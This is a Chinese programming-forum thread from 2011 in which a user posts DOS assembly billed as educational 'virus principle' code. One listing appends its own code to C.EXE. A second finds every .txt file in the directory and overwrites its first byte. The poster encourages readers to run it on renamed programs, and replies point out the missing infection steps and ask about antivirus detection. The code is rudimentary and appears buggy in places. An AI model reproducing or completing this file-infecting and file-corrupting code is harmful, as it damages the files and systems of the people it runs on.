自己用汇编写的一段病毒原理代码

柏柏

1. 这段代码就是复制自身代码的某段到别的程序尾部！！ 我修改了此病毒!!

复制代码

                  更新中！往下看！下面有附件！！

1. assume cs:code,ds:code
   
2. code segment
   
3. VirusStart:
   
4. pop si
   
5. start: jmp xc
   
6. ;---------------------------------------------
   
7. f_namea db 'C.EXE',0 ;f_namea 存放文件名称
   
8. f_worda dw ?,0 ;f-worda 存放'文件内容!'
   
9. f_hao dw ?,0 ;f_hao 存放句柄
   
10. VirusLength equ VirusEnd-VirusStart
    
11. ;-----------------------------------------------
    
12. xc:
    
13. mov ah,3dh ;打开文件
    
14. mov dx,code
    
15. mov ds,dx
    
16. lea dx,f_namea
    
17. mov al,2
    
18. int 21h
    
19. mov f_hao,ax ;这是AX文件句柄->给f_hao存放
    
20. xwz:
    
21. mov ah,42h ;移动文件指针
    
22. mov al,2 ;到文件尾部
    
23. mov bx,f_hao
    
24. xor cx,cx
    
25. xor dx,dx
    
26. int 21h
    
27. xw:
    
28. mov ah,40h ;写入内容
    
29. mov bx,f_hao ;把文件句柄给bx
    
30. mov dx,si
    
31. mov cx,VirusLength
    
32. int 21h
    
33. xend:
    
34. mov ax,4c00h
    
35. int 21h
    
36. VirusEnd EQU $
    
37. code ends
    
38. end start

复制代码

                               
登录/注册后可看大图

深蓝

强呀。。还是有些东西没看懂。。

顶你~~~

cyousui

剩下的就是重定位，改写目标程序入口地址

Mr.han

好好学习，天天向上，支持鱼C，哦也！！

柏柏

此病毒就 是 把自己程序代码复制到 目录下 C.EXE文件的尾部。
没有什么危害但是请慎用！！

                                             --2011年10月3 日

柏柏

也可以试验一下，把别的程序复制到目录下，再改为c.exe在运行下！！

柏柏

先把别的程序复到 病毒程序 目录下 再改名为C.exe
然后 在点击 c.exe 看看有什么效果！

柏柏

喜欢 就
                    喜欢

苍白の月

杀毒软件杀得动吗？？

柏柏

苍白の月 发表于 2011-10-3 10:53

                               
登录/注册后可看大图

杀毒软件杀得动吗？？

恩,没有什么加密解密的,隐藏什么

JMP

{:1_1:}支持下，顶顶顶！！！

s0512

嗯。。。大大的GOOD

关键是感觉

支持一下把
！

cqy55555

很好,很强大,顶顶更强大!

crazylinux

经典喜欢加油

柏柏

搜索代码：功能查找目录所有的[*。txt]文本文件 并在开头写入‘a’ 代码如下。不重复写入文件!!

1. .model tiny
   
2. .code
   
3. ORG 100h
   
4. start:
   
5. ;========================
   
6. a db ?,0
   
7. bword db 'a',0
   
8. fhao dw ?,0
   
9. fname db '**.txt',0
   
10. ;;========================
    
11. mov ah,4Eh ;查找第一个文件
    
12. mov dx,offset fname
    
13. int 21h
    
14. sloop:
    
15. jc fend
    
16. mov ax,3D02H  ;r/w 方式打开文件
    
17. mov dx,9Eh        ;文件名存放在dta
    
18. int 21h
    
19. mov fhao,ax       ;文件句柄存放在fhao
    
20. 
    
21. mov bx,fhao
    
22. mov cx,1
    
23. mov dx,offset a
    
24. mov ax,3f00h ;读文件开头前1个字节 因为cx=1
    
25. int 21h
    
26. 
    
27. cmp WORD ptr [a],'a' ;比较当前打开文件开头如果写过久跳转
    
28. je ft   ;跳转
    
29. 
    
30. 
    
31. mov bx,fhao
    
32. mov dx,offset bword
    
33. mov cx,1
    
34. mov ah,40h   ;写文件 文件内容为‘a’
    
35. int 21h
    
36. 
    
37. ; mov ah,3eh  ;关闭文件
    
38. ; mov bx,fhao
    
39. ; int 21h
    
40. 
    
41. ft:
    
42. mov ah,4Fh ;查找下一个文件
    
43. int 21h
    
44. jmp sloop
    
45. fend: mov ax,4c00h
    
46. int 21h
    
47. 
    
48. end start

复制代码

wei522688662

厉害!

嗜血灵异狂

问下  这段代码有什么功能   可以让计算机死机蓝屏  还是关机重启不了   还是监控     盗号呢？

Mr.han

我是看不懂了 总之LZ比我强

柏柏

嗜血灵异狂 发表于 2011-10-5 20:04

                               
登录/注册后可看大图

问下  这段代码有什么功能   可以让计算机死机蓝屏  还是关机重启不了   还是监控     盗号呢？

代码没有你说的这样!
代码前面有说明